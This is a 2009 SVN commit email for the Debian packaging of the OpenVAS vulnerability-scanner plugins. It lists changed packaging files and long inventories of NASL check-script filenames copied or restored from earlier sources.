From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 7 Oct 2009 00:38:58 +0200 (CEST) Subject: [Openvas-commits] r5408 - in trunk/openvas-packaging/openvas-plugins/debian/trunk/debian: . audit patches po Message-ID: <20091006223858.D0A99861EAAA@pyrosoma.intevation.org> Author: jfs Date: 2009-10-07 00:38:55 +0200 (Wed, 07 Oct 2009) New Revision: 5408 Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/TODO trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/audit/ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/audit/COPY-OPENVAS trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/audit/RESTORED trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.config trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.postinst trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.postrm trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.preinst trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.templates trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/POTFILES.in trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/ca.po trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/cs.po trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/da.po trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/de.po trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/es.po trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/fr.po trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/ja.po trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/nl.po trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/pt.po trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/pt_BR.po trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/sv.po 
trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/templates.pot trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/vi.po Removed: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/README.source trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/patches/10_fix_install_permissions.dpatch Modified: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/changelog trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/control trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/copyright trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/openvas-plugins.dirs trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/patches/00list trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/rules Log: Debian packaging for the 1.0.2-1 of the openvas-plugins package (not distributed by Debian) Deleted: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/README.source =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/README.source 2009-10-06 16:45:43 UTC (rev 5407) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/README.source 2009-10-06 22:38:55 UTC (rev 5408) @@ -1,7 +0,0 @@ -The new orig tarball can be created by removing the following directories: - -rm -rf audit/ docs/ extra/ packaging/ scripts/ template.nasl - -For the rest we use dpatch for patch handling inside our package(s). Please -see /usr/share/doc/dpatch/README.source.gz (if you have installed dpatch) for -documentation about dpatch. Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/TODO =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/TODO 2009-10-06 16:45:43 UTC (rev 5407) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/TODO 2009-10-06 22:38:55 UTC (rev 5408) 
@@ -0,0 +1,5 @@ + +- Update the debconf questions, they still talk about Nessus + --> update also the translations + +- See if the debconf questions are still relevant for OpenVAS Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/audit/COPY-OPENVAS =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/audit/COPY-OPENVAS 2009-10-06 16:45:43 UTC (rev 5407) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/audit/COPY-OPENVAS 2009-10-06 22:38:55 UTC (rev 5408) 
@@ -0,0 +1,268 @@ +# Scripts copied from OpenVAS sources +# +4d_webstar_remote_buff_overflow.nasl +4d_webstar_symb_link.nasl +4images_171_directory_traversal.nasl +Accelar_1200.nasl +account_bash.nasl +account_debug_synnet.nasl +account_help.nasl +account_public_public.nasl +account_super_debug.nasl +account_super_forgot.nasl +account_user_debug.nasl +account_user_forgot.nasl +advanced_guestbook.nasl +aenovo_db_disclosure.nasl +Allied_Telesyn_telnet.nasl +Allied_Telesyn_web.nasl +anaconda_doublenull.nasl +apache_htpasswd_overflow.nasl +apache_input_header_folding_dos.nasl +apache_mod_include_priv_escalation.nasl +apache_mod_proxy_buff_overflow.nasl +apache_SSL_complain.nasl +argosoft_multiple_flaws2.nasl +articlelive_xss.nasl +aspdev_imgtag.nasl +asp_inline_sql_injection.nasl +aspjar_sql_injection.nasl +athena_web_remote_cmd_exec.nasl +atutor_multiple_flaws.nasl +avaya_switches.nasl +aventail_asap.nasl +awstats_configdir.nasl +aztek_xss.nasl +b2evolution_net_sql_injection.nasl +backoffice_lite_bypass.nasl +bblog_sql_inject.nasl +bofra_detect.nasl +bookreview_xss.nasl +breakcal_xss.nasl +brio_dir_traversal.nasl +bugport_attachment_handling_flaw.nasl +bugzilla_remote_exec.nasl +calendar_express_flaws.nasl +calendarix_sql.nasl +calendar_scheduler_xss.nasl +CA_License_Service_Stack_Overflow.nasl +cern_httpd_access_ctrl.nasl +cern_httpd_cginame_overflow.nasl +cgi_rb.nasl +check_dns_tcp.nasl +checkpoint_secureplatform.nasl +check_smtp_helo.nasl +cheopsNG_detect.nasl +CiscoVG248.nasl +citrix_xss.nasl +citrusdb_cc_disclosure.nasl +cjoverkill_xss.nasl +clearswift_mimesweeper_smtp_detect.nasl +codethatshoppingcart_sql.nasl +community_link_pro_login_remote_cmd_exec.nasl +consolehelp.nasl +cubecart_lang_xss.nasl +cups_empty_udp_dos.nasl +cups_multiple_vulnerabilities.nasl +cutenews_dir_traversal.nasl +cutenews_indexphp_xss.nasl +cutenews_xss.nasl +cvstrac_account_deletion.nasl +cyberstrong_eshop_sql.nasl +dada_mail_xss.nasl +deluxeBB_sql_injection.nasl 
+desknow_multiple_vuln.nasl +digital_scribe_login_sql_inject.nasl +discuz_arbitrary_file_upload_flaw.nasl +dotnetnuke_xss.nasl +dream4_koobi_cms_sql.nasl +e107_sql_injection.nasl +easy_message_board_cmd_exec.nasl +egd_detect.nasl +episodex_guestbook.nasl +famd_detect.nasl +find_service1.nasl +fishcart_sql_injection.nasl +ftp_kibuv_worm.nasl +fusion_sbx_bypass.nasl +goollery_xss.nasl +gosmart_message_board.nasl +greymatter_html_inject.nasl +guppy_request_header_flaws.nasl +hcl_file_include.nasl +horde_3_0_xss.nasl +horde_detect.nasl +horde_help_xss.nasl +hp_data_protector_installed.nasl +htdig_xss.nasl +http_header_name_format_string.nasl +http_header_value_format_string.nasl +http_url_format_string.nasl +iax2_detection.nasl +ibproarcade_sql_injection.nasl +ident_backdoor2.nasl +ilo_detect.nasl +ilohamail_conf_files_readable.nasl +i-mall_cgi.nasl +imap_unencrypted_cleartext_logins.nasl +imp_status_xss.nasl +imss_detect.nasl +includer_rcmdexec.nasl +inserter_file_inclusion.nasl +interspect_detect.nasl +intrushield_console_detect.nasl +invision_pwb.nasl +iss_deploymanager.nasl +iwss_detect.nasl +jaws_file_inclusion.nasl +jgsportal_sql.nasl +kayako_sql_injection.nasl +kerio_wrf_management_detection.nasl +last10_sql_injection.nasl +ldapsearch.nasl +ldu_detection.nasl +limbo_multiple_flaws.nasl +linksys_multiple_vulns.nasl +lotus_domino_xss.nasl +mailgust_sql_injection.nasl +mailman_detect.nasl +mambo_flaws.nasl +mambo_xss3.nasl +mantis_file_incl_sql_inject.nasl +mantis_multiple_vulns4.nasl +mercuryboard_multiple_vuln.nasl +metacart_sql.nasl +minishare_overflow.nasl +mod_ssl_hook_functions_format_string_vuln.nasl +moodle_php_reply_variable_xss.nasl +movabletype_cfg.nasl +mozilla_certif_handle_dos.nasl +mozilla_default_perms.nasl +mozilla_firefox_xul_spoof.nasl +mt-load_cgi.nasl +mvnforum_search_xss.nasl +mybloggie_sql_injection.nasl +myserver_dir_list_and_xss.nasl +mysql_eventum_flaws.nasl +netop.inc +netref_cat_for_gen.nasl +nortel_webadmin.nasl +openbb_flaws.nasl 
+openbb_xss.nasl +openwebmail_logindomain_xss.nasl +oracle_enterprise_manager.nasl +osCommerce_dirtraversal.nasl +owa_sqlinject.nasl +photopost_sql_injection.nasl +phpadsnew_xss.nasl +php_arbitrary_file_access.nasl +phpauction_admin.nasl +phpbb_fetch_all_sql_injection.nasl +phpbugtracker_bug_sql.nasl +phpcms_xss.nasl +phpdocumentor_1_3_remote_file_inclusion.nasl +php_fusion_sql_inject.nasl +php_fusion_xss.nasl +phpgroupware_html_injection2.nasl +phpgroupware_remote_file_include.nasl +phpmychat_information_disclosure.nasl +phpmyfaq_action_parameter_flaw.nasl +phproxy_xss.nasl +php_strip_tags_memory_limit_vuln.nasl +phpSurveyor_sql_inject.nasl +phpweblog_xss.nasl +plumecms_prepend_file_inclusion.nasl +pop3_unencrypted_cleartext_logins.nasl +postnuke_news_xss.nasl +psnews_xss.nasl +psychostats_xss.nasl +punBB_detect.nasl +pwsphp_xss.nasl +qwikiwiki_file_inclusion.nasl +raidenHTTPD_dir_traversal.nasl +rcblog_dir_transversal.nasl +RM_safetynet_xss.nasl +rsa_authentication_agent_xss.nasl +sambar_admin_xss.nasl +sambar_search_dos.nasl +securecrt_remote_overflow.nasl +securenet_provider_detect.nasl +serendipity_xss.nasl +sgallery_sql_injection.nasl +skullsplitter_html_injection.nasl +slad_fetch_results.nasl +slad_init.nasl +slad_run.nasl +slad_ssh.inc +slident.nasl +smb_nt_ms04-026.nasl +smb_nt_ms04-039.nasl +socks4_loop_connect.nasl +socks5_loop_connect.nasl +sonicwall_soho_10_xss.nasl +sparkleblog_sql_injection.nasl +sphpblog_dir_traversal.nasl +spip_sql_injection.nasl +squid_rdos.nasl +ssh_get_info.nasl +sugarcrm_remote_file_inclusion.nasl +sympa_do_search_list_overflow.nasl +sympa_invalid_ldap_pass.nasl +sympa_queue_utility_priv_escalation.nasl +sympa_unauthorised_list_creation.nasl +teekai_track_online_xss.nasl +tetrinet_detect.nasl +tftpd_dir_trav.nasl +tftpd_overflow.nasl +tftpd_small_overflow.nasl +tftp_files_cisco_ios.nasl +tikiwiki_multiple_input_flaws.nasl +tikiwiki_remote_flaws.nasl +tikiwiki_xss.nasl +tmcm_detect.nasl +towerblog_admin_bypass.nasl 
+trac_sql_injection.nasl +turboseek_read_file.nasl +tutos_input_vuln.nasl +uebimiau_session_disclosure.nasl +ultravnc_dsm_detect.nasl +unprotected_webadmin_php.nasl +upb_weak_pass.nasl +upd_xss_sql_injection.nasl +vbulletin_detect.nasl +vbulletin_forumdisplay_remote_cmd_exec.nasl +vbulletin_init_php_flaw.nasl +vbulletin_xss2.nasl +vbulletin_xss3.nasl +vbulletin_xss.nasl +verity_ultraseek_xss.nasl +visnetic_mailserver_flaws.nasl +vmware_server_detect.nasl +vnc_security_types.nasl +vtiger_flaws.nasl +w3who_dll.nasl +wackowiki_xss.nasl +w_agora_dir_traversal2.nasl +w_agora_dir_traversal.nasl +webapp_apage_cmd_exe.nasl +webcalendar_sql_injection.nasl +webgui_remote_cmd_exec.nasl +webhints_remote_cmd_exec.nasl +weblibs_file_inclusion.nasl +websense_detect.nasl +webserver_favicon.nasl +webwasher_conf_xss.nasl +winmail_mail_server_information_disclosure.nasl +wowBB_sql_injection.nasl +wsus_detect.nasl +xaraya_detection.nasl +yabb_xss.nasl +yacy_xss.nasl +yapig_multiple_flaws.nasl +yapig_pass_dir_access.nasl +yapig_remote_vuln.nasl +yawcam_dir_traversal.nasl +yusasp_asset_manager_detection.nasl +zeroboard_flaws2.nasl +zeroboard_flaws.nasl +zeroboard_xss.nasl Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/audit/RESTORED =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/audit/RESTORED 2009-10-06 16:45:43 UTC (rev 5407) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/audit/RESTORED 2009-10-06 22:38:55 UTC (rev 5408) 
@@ -0,0 +1,1586 @@ +# Scripts restored from the 2.2 sources +# (minus those scripts that were (C) Tenable) +12planet_chat_server_path_disclosure.nasl +12planet_chat_server_plaintext_password.nasl +12planet_chat_server_xss.nasl +3com_config_disclosure.nasl +3com_nbx_voip_netset_detection.nasl +3com_ras_crash.nasl +3com_switches.nasl +404_path_disclosure.nasl +a1stats.nasl +aardvark_topsites_multiple.nasl +abyss_dos.nasl +acc.nasl +account_4Dgifts.nasl +account_backdoor.nasl +account_date.nasl +account_db2as_db2as.nasl +account_db2as_ibmdb2.nasl +account_db2fenc1_db2fenc1.nasl +account_db2fenc1_ibmdb2.nasl +account_db2inst1_db2inst1.nasl +account_db2inst1_ibmdb2.nasl +account_demos.nasl +account_EZsetup.nasl +account_friday.nasl +account_gamez_lrkr0x.nasl +account_glftpd.nasl +account_guest_guest.nasl +account_guest.nasl +account_hax0r.nasl +account_jack.nasl +account_jill.nasl +account_lp.nasl +account_OutOfBox.nasl +account_rewt_satori.nasl +account_root.nasl +account_root_rootkit1bis.nasl +account_root_rootkit1.nasl +account_root_rootkit2.nasl +account_root_root.nasl +account_StoogR.nasl +account_swift_swift.nasl +account_sync.nasl +account_system_manager.nasl +account_toor.nasl +account_tutor.nasl +account_wank_wank.nasl +achievo_code_injection.nasl +activestate_perl.nasl +active_sync_overflow.nasl +ad_cgi.nasl +adcycle_pass_disclosure.nasl +admentor_login_flaw.nasl +advanced_poll_phpinfo.nasl +agora.nasl +aix_ftpd.nasl +aix.inc +album_pl_cmd_exec.nasl +alcatel_adsl.nasl +alcatel_backdoor_switch.nasl +alcatel_pabx4400_detect.nasl +alchemy_eye_http.nasl +alexandriadev_upload_spoofing.nasl +alibaba_get32.nasl +alibaba.nasl +alibaba_overflow.nasl +alibaba_pl.nasl +alibaba_tst.nasl +alienform.nasl +altavista_search.nasl +alya.nasl +amanda_detect.nasl +amanda_version.nasl +anacondaclip.nasl +anaconda.nasl +analogx_dos.nasl +analogx.nasl +analogx_traversal.nasl +an_httpd_cgis.nasl +an_httpd_count_cgi.nasl +annex_dos.nasl +anti_nessus.nasl +AnyForm.nasl 
+apache_1_3_27.nasl +apache_2_0_42.nasl +apache_2_0_45.nasl +apache_2_0_45_OS2.nasl +apache_2_0_46.nasl +apache_2_0_47.nasl +apache_access_wo_netmask.nasl +apache_chunked_encoding.nasl +apache_log_injection.nasl +apache_server_info.nasl +apache_server_status.nasl +apache_slash.nasl +apache_source_asp.nasl +apache_ssl_overflow.nasl +apache_Tomcat_Servlet_XSS.nasl +apache_Tomcat_TroubleShooter.nasl +apache_username.nasl +apache_win32_devname.nasl +apache_win32_dir_trav.nasl +apache_win32_read_files.nasl +apcnisd_detect.nasl +apcupsd_overflows.nasl +arcserve_hidden_share.nasl +args_bat.nasl +arkeia.nasl +artmedic_kleinanzeigen_file_inclusion.nasl +artmedic_links5_file_inclusion.nasl +ascend_kill.nasl +asip-status.nasl +asp_net_css.nasl +asp_net_path_disclosure.nasl +asp_source_data.nasl +asp_source_dot.nasl +asp_source_space.nasl +ath0_hangup.nasl +auctiondeluxe_xss.nasl +auktion_cgi.nasl +auth_enabled.nasl +avengers_news_system_command_execution.nasl +avirt_gateway_telnet.nasl +avotus_mm.nasl +awol_injection.nasl +awstats_input_vuln.nasl +axent_raptor_dos.nasl +axis2400_webcams.nasl +axis_camera.nasl +axis.nasl +backorifice1.nasl +backport.inc +badblue_null_byte.nasl +badblue_remote_administrative_access2.nasl +badblue_remote_administrative_access.nasl +bakfiles.nasl +basilix_content_type_xss.nasl +basilix_detect.nasl +basilix_inc_files.nasl +basilix_webmail.nasl +basit_xss.nasl +bb-hist.nasl +bb-hostsvc.nasl +bboard.nasl +BEA_weblogic_Reveal_Script_Code_2.nasl +BEA_weblogic_Reveal_Script_Code_3.nasl +BEA_weblogic_Reveal_Script_Code.nasl +benhur_ftp_firewall.nasl +bftelnet.nasl +bftpd_chown.nasl +bftpd_format_string.nasl +bgp_detect.nasl +bigconf.nasl +bind9_dos.nasl +bind9_overflow.nasl +bind_allows_updates.nasl +bind_authors.nasl +bind_covert_overflows.nasl +bind_dnsstorm.nasl +bind_iquery.nasl +bind_query.nasl +bind_resolver_overflow.nasl +bind_sig_cached_rr_overflow.nasl +bind_version.nasl +bind_vulnerable.nasl +bind_zxfr_bug.nasl +binlogin_overflow_rlogin.nasl 
+binlogin_overflow_telnet.nasl +bitkeeper_remote_shell.nasl +bizdb1_search.nasl +blackboard_remote_file_include.nasl +bonk.nasl +bonsai_flaws.nasl +bootparamd_get_nis_domain.nasl +bootparamd.nasl +boozt_admin_overflow.nasl +broadvision_path_disclosure.nasl +broker_ftp.nasl +bsml_info_disclosure.nasl +bttlxe_sql_injection.nasl +bugbear_b.nasl +bugbear.nasl +bugzilla_detect.nasl +bugzilla_vulns.nasl +bugzilla_xss_and_tmp_files.nasl +c32.nasl +cachefsd_overflow.nasl +cachemgr_cgi.nasl +cactuShop_multiple_flaws.nasl +calendar.nasl +campas.nasl +canna_overflow.nasl +carello.nasl +cart32_xss.nasl +cassandra_nntp_dos.nasl +cayman_any_username.nasl +cc_guestbook.nasl +cdk.nasl +cern_httpd_path.nasl +cf_debug.nasl +cfinger_format_bug.nasl +cfinger_search.nasl +cfinger_version.nasl +cgibin_browsable.nasl +cgibin_in_kb.nasl +cgicso_command_execution.nasl +cgicso_cross_site_scripting.nasl +cgiforum.nasl +cgimail.nasl +cgitest.nasl +cgiwebupdate.nasl +cgiwrap.nasl +chameleon_smtpd_overflow.nasl +changepw.nasl +chargen.nasl +checkpoint.nasl +checkpoint_open_web_admin.nasl +chora_detect.nasl +chora_remote_code_execution.nasl +cifs445.nasl +cisco_675_http_dos.nasl +cisco_675.nasl +cisco_acs_web_overflow.nasl +cisco_aironet_dos.nasl +cisco_ata186_password_circumvent.nasl +cisco_catalyst.nasl +cisco_dos.nasl +cisco_gsr_acl.nasl +cisco_gsr_unreachable.nasl +cisco_http_admin_access.nasl +cisco_http_dos.nasl +cisco_ipv4_dos.nasl +cisco_no_pw.nasl +cisco_ssh_multiple_vulns.nasl +cisco-view-source-dos.nasl +cisco_voip_dos.nasl +citrix_web_xss.nasl +clarkconnectd.nasl +cleartrust_xss.nasl +cmail_overflow.nasl +cobalt_cube_webmail_dir_trav.nasl +cobalt_overflow_cgi.nasl +cobalt_web_admin_server.nasl +codered_x.nasl +cold_fusion_admin_dos.nasl +ColdFusion.nasl +ColdFusion_path_disclosure.nasl +comersus_xss.nasl +commerce_cgi.nasl +communigatepro_overflow.nasl +communigatepro_referer_field.nasl +compaq_wbem_detect.nasl +compaq_wbem_SSI_DoS.nasl +coppermine_gallery_cmd_exec.nasl 
+coppermine_gallery_sql_injection.nasl +count_cgi.nasl +counter.nasl +cpanel_cmd_exec.nasl +cp-firewall-auth.nasl +cp-firewall-webauth.nasl +crlinux_file_reading.nasl +cross_site_scripting.nasl +CSCdi34061.nasl +CSCdi36962.nasl +CSCdp35794.nasl +CSCdp58462.nasl +CSCds04747.nasl +CSCds07326.nasl +CSCds66191.nasl +CSCdt46181.nasl +CSCdt56514.nasl +CSCdt62732.nasl +CSCdt65960.nasl +CSCdt93866.nasl +CSCdu15622.nasl +CSCdu20643.nasl +CSCdu35577.nasl +CSCdu35577_web.nasl +CSCdu81936.nasl +CSCdu82823.nasl +CSCdv48261.nasl +CSCdv66718.nasl +CSCdv85279.nasl +CSCdv88230.nasl +CSCdw19195.nasl +CSCdw33027.nasl +CSCdw50657.nasl +CSCdw67458.nasl +CSCdx07754.nasl +CSCdx39981.nasl +CSCdx54675.nasl +CSCdx92043.nasl +CSCdy03429.nasl +CSCdy26428.nasl +CSCdy38035.nasl +CSCdz39284.nasl +CSCdz60229.nasl +CSCea42030.nasl +CSCea77143.nasl +csm_helo.nasl +csnews.nasl +csSearch_cgi.nasl +cups_vulns.nasl +CuteNews_code_injection.nasl +cutenews_show_news_xss.nasl +cvs_double_free.nasl +cvs_in_www.nasl +cvs_public_pserver.nasl +cvsweb_shell.nasl +cvsweb_version.nasl +cwmail.nasl +dameware_mini_remote_control_disclosure.nasl +dangerous_cgis.nasl +dansie_cart.nasl +daytime.nasl +db4web_dir_trav.nasl +db4web_tcp_relay.nasl +dcetest.nasl +dcforum.nasl +dcp_portal_injection.nasl +dcp_portal_path_disclosure.nasl +dcp_portal_xss.nasl +dcshop_information_disclosure.nasl +DDI_AirConnect_Default_Password.nasl +ddicgi.nasl +DDI_Compaq_Mgmt_Proxy.nasl +DDI_Directory_Scanner.nasl +DDI_Enhydra_Default.nasl +DDI_F5_Default_Support.nasl +DDI_FTP_Any_User_Login.nasl +DDI_GlobalASA_Retrieval.nasl +DDI_IIS_Compromised.nasl +DDI_IIS_dotNet_Trace.nasl +DDI_JavaServer_Default.nasl +DDI_JRun_Sample_Files.nasl +DDI_JRun_Traversal.nasl +DDI_LanRover_Blank_Password.nasl +DDI_motorola_vanguard_no_pass.nasl +DDI_MRTG_File_Read.nasl +DDI_Netscape_Enterprise_Default_Administrative_Password.nasl +DDI_Netware_Management_Portal.nasl +DDI_PIX_Firewall_Manager.nasl +DDI_Unprotected_SiteScope.nasl +deep_throat.nasl 
+default_account.inc +defaultnavcheck.nasl +delegate_overflow.nasl +dell_openmanage.nasl +devoyBB_flaws.nasl +dhcp_minires_and_fmt_string.nasl +dhcp.nasl +directory_manager.nasl +directoryphp.nasl +directorypro.nasl +distcc_detection.nasl +dmail_overflow.nasl +dns_server.nasl +doc_browsable.nasl +doc_package_browseable.nasl +domino5_overflows.nasl +domino6_overflows.nasl +domino_authentication_bypass.nasl +domino_default_db.nasl +domino_fs_config.nasl +domino_http_dos.nasl +domino.nasl +domino_traversal.nasl +domino_xss.nasl +dont_print_on_printers.nasl +dont_scan_printers.nasl +doublecheck_std_services.nasl +dragon_ftp.nasl +dragon_telnet.nasl +dtspcd.nasl +dumpenv.nasl +dump.inc +dwhttp_format_string.nasl +ecartis_hidden_username.nasl +echo.nasl +eDonkey_detect.nasl +eftp_dos.nasl +egp_detect.nasl +eicon_modem_dos.nasl +empower_path.nasl +emule_dos.nasl +epolicy_orchestrator_format_string.nasl +eserv.nasl +eshop_information_disclosure.nasl +etheni_code_injection.nasl +etherleak.nasl +eviewer.nasl +ewave_servlet_upload.nasl +ews.nasl +ExAir_dos_advsearch.nasl +ExAir_dos_query.nasl +ExAir_dos_search.nasl +exchange_dos.nasl +exchange_public_folders_information_leak.nasl +external_svc_ident.nasl +eXtremail_format_strings.nasl +ezcontents_code_execution.nasl +ezpublish_config_disclosure.nasl +ezpublish_xss.nasl +ezshopper.nasl +EZsiteForum.nasl +fakebo.nasl +fake_identd.nasl +faqmanager.nasl +faq_o_matic_xss.nasl +faxsurvey.nasl +fcgi_echo.nasl +filemakerpro_server.nasl +find_service2.nasl +find_service_3digits.nasl +finger_0.nasl +finger_backdoor.nasl +finger_cgi.nasl +finger_dot.nasl +finger_freebsd.nasl +finger.nasl +finger_redirection.nasl +finger_solaris_disclosure.nasl +firewall1_dos.nasl +flash_player_overflows.nasl +flexwatch_auth_bypass.nasl +formhandler.nasl +formmail_version_disclosure.nasl +foxweb_dll.nasl +fp_fpcount.nasl +fp_htimage.nasl +frontpage_authors.nasl +frontpage_dos.nasl +frontpage_dvwssr.nasl +frontpage.nasl +frontpage_overflow.nasl 
+frontpage_passwordless.nasl +frontpage_shtml.nasl +frontpage_shtml_overflow.nasl +frontpage_xss.nasl +fsp_detection.nasl +ftgate_pro_dos.nasl +ftp_anonymous.nasl +ftp_backdoor.nasl +ftp_bounce.nasl +ftp_check_user.nasl +ftp_cwd_root.nasl +ftp_forward.nasl +ftpgate.nasl +ftp_glob_overflow.nasl +ftp_nb1300_router.nasl +ftp_overflow.nasl +ftp_pasv_dos.nasl +ftp_pasv_on_connect.nasl +ftp_pl.nasl +ftp_qnx_stack_overflow.nasl +ftp_realpath.nasl +ftp_rhosts.nasl +ftp_root.nasl +ftp_servu_dos2.nasl +ftp_servu_dos.nasl +ftp_servu_path_disclosure.nasl +ftp_servu_traversal.nasl +ftp_setproctitle.nasl +ftp_site_exec.nasl +ftp_sol_check_user.nasl +ftp_traversal.nasl +ftp_zaurus.nasl +fusetalk_forum_xss.nasl +gallery_injection.nasl +gamespy_detect.nasl +gatecrasher.nasl +gator.nasl +gauntlet_overflow.nasl +gemitel_file_inclusion.nasl +generic_WEB-INF.nasl +girlfriend.nasl +glimpse.nasl +gnapster_get_file.nasl +gnutella_detect.nasl +gnutella_export.nasl +goodtech_ftpd_dos.nasl +GOsa_code_injection.nasl +groupwise_overflow.nasl +groupwise_web_interface_help_hole.nasl +groupwise_web_interface_htmlver_hole.nasl +GTcatalog_code_injection.nasl +GTcatalog_password.nasl +guestbook_beanwebb.nasl +guestbook_justice.nasl +guestbook.nasl +guestbook_pl.nasl +guestbook_tr3_passwd.nasl +guild_ftp.nasl +gupta_sqlbase_overflows.nasl +handler.nasl +happymall_cmd_exec.nasl +hello_detect.nasl +homefree.nasl +horde_test_disclosure.nasl +hosting_controller.nasl +hp_instant_toptools_dos.nasl +hp_jetdirect_vulns.nasl +hp_printer_display.nasl +hp_remote_print.nasl +hpux_ftpd.nasl +hsweb_location.nasl +hsx.nasl +htdig.nasl +htgrep.nasl +htmlscript.nasl +htsearch_config_switch.nasl +htsearch_location.nasl +http_asn1_decoding.nasl +httpd_nobody.nasl +http_ids_evasion.nasl +http_keepalive.inc +http_method_format_string.nasl +httpver.nasl +http_webshopper.nasl +http_webstore.nasl +hyperbomb.nasl +i2odialogd.nasl +ibillpm_detect.nasl +ibm_server_code.nasl +icat.nasl +icecap_default_pw.nasl 
+icecast_disclosure.nasl +icecast_overflow.nasl +iChat.nasl +icmp_mask_req.nasl +icmp_timestamp.nasl +icq_crash.nasl +icq_installed.nasl +icq_vulns.nasl +ideabox_code_injection.nasl +idealbb_multiple_flaws.nasl +ident_backdoor.nasl +ident_process_owner.nasl +idq_dll.nasl +ids_evasion.nasl +iis5_isapi_printer.nasl +iis5_printer.nasl +iis5_sample_cross_site.nasl +iis5_sample_path.nasl +iisadmin.nasl +iis_asp_overflow.nasl +iis_authentification_manager.nasl +iis_bdir.nasl +iis_buffer_overflow.nasl +iis_codebrws.nasl +iis_crash.nasl +iis_decode_bug.nasl +iis_dir_traversal.nasl +iis_dos_ussrback.nasl +iis_dot_cnf.nasl +IIS_frontpage_DOS_2.nasl +iis_frontpage_dos.nasl +iis_ftp_crash.nasl +iis_htr_isapi.nasl +iis_htr_overflow.nasl +iis_isapi_overflow.nasl +iis_malformed_request.nasl +iis_perl_problem.nasl +iis_propfind_dos.nasl +iis_repost_asp.nasl +iis_samples.nasl +iis_scripts.nasl +iis_unc_mapped_virt_host_vuln.nasl +iis_ver_check.nasl +iis_viewcode.nasl +iis_webdav_overflow.nasl +iis_xss_404.nasl +iis_xss_idc.nasl +ikonboard_cmd_exec.nasl +ilohamail_arbitrary_file_access_via_lang.nasl +ilohamail_arbitrary_file_access_via_session.nasl +ilohamail_detect.nasl +imagemap.nasl +imail_host_overflow.nasl +imail_imapd_overflow.nasl +imail_imonitor_overflow.nasl +imap4_rev1_overflow.nasl +imap_arbitrary_file_retrieval.nasl +imap_body_overflow.nasl +imap_overflow.nasl +imate_overflow.nasl +imp_detect.nasl +imp_session_hijacking.nasl +imp_sql_injection.nasl +in_fingerd.nasl +info2www.nasl +informix_traversal.nasl +infosrch.nasl +inktomi_path_disclosure.nasl +innd_overflow.nasl +inn.nasl +instaboard_sql_injection.nasl +interchange_detect.nasl +interscan_dos.nasl +interscan_vw_cgi.nasl +invision_power_board_calendar_sql_injection.nasl +invision_power_board.nasl +invision_power_top_site_sql_injection.nasl +ion_p.nasl +iParty.nasl +ipb_sql_disclosure.nasl +iplanet_app_server_detection.nasl +iplanet_app_server_overflow.nasl +iplanet_chunked_encoding.nasl +iplanet_dir_serv.nasl 
+iplanet_search.nasl +iplanet_traversal.nasl +ipop2d.nasl +ipop2d_readfiles.nasl +irix_copilot.nasl +ismail_overflow.nasl +ithousemail_bof.nasl +iws_shtml.nasl +java_jre_jdk_dos.nasl +jj.nasl +JM_RemoteNC.nasl +JM_urcs.nasl +jordan_telnet_overflow.nasl +jrun_dir_listing.nasl +jrun_getdir.nasl +jrun.nasl +Jserv_css.nasl +jserv_execute.nasl +jshop_xss.nasl +js.scob.trojan.nasl +jwalk_traversal.nasl +kazaa_installed.nasl +kazaa_morpheus_detect.nasl +KBWebServer_percent00.nasl +kebi_traversal.nasl +keene_xss.nasl +ken_segfault.nasl +kerberos4_crypto_weaknesses.nasl +kerberos5_issues.nasl +kerberos_overflow.nasl +kerio_PF_udpbypass.nasl +kietu_code_injection.nasl +knowledge_builder_code_execution.nasl +kpym_telnet_overflow.nasl +krb_pingpong.nasl +kw_whois.nasl +l2tpd_dos.nasl +l2tp_detection.nasl +l2tpd_overflow.nasl +land.nasl +libgtop_daemon.nasl +limewire_installed.nasl +line_overflow.nasl +linksys_ap_default_password.nasl +linksys_next_file_file_disclosure.nasl +linux_zero_len_fragment.nasl +lion.nasl +listrec.nasl +logins.nasl +lotus_envid.nasl +lotus_esmtp_overflow.nasl +lotus_path_disclosure.nasl 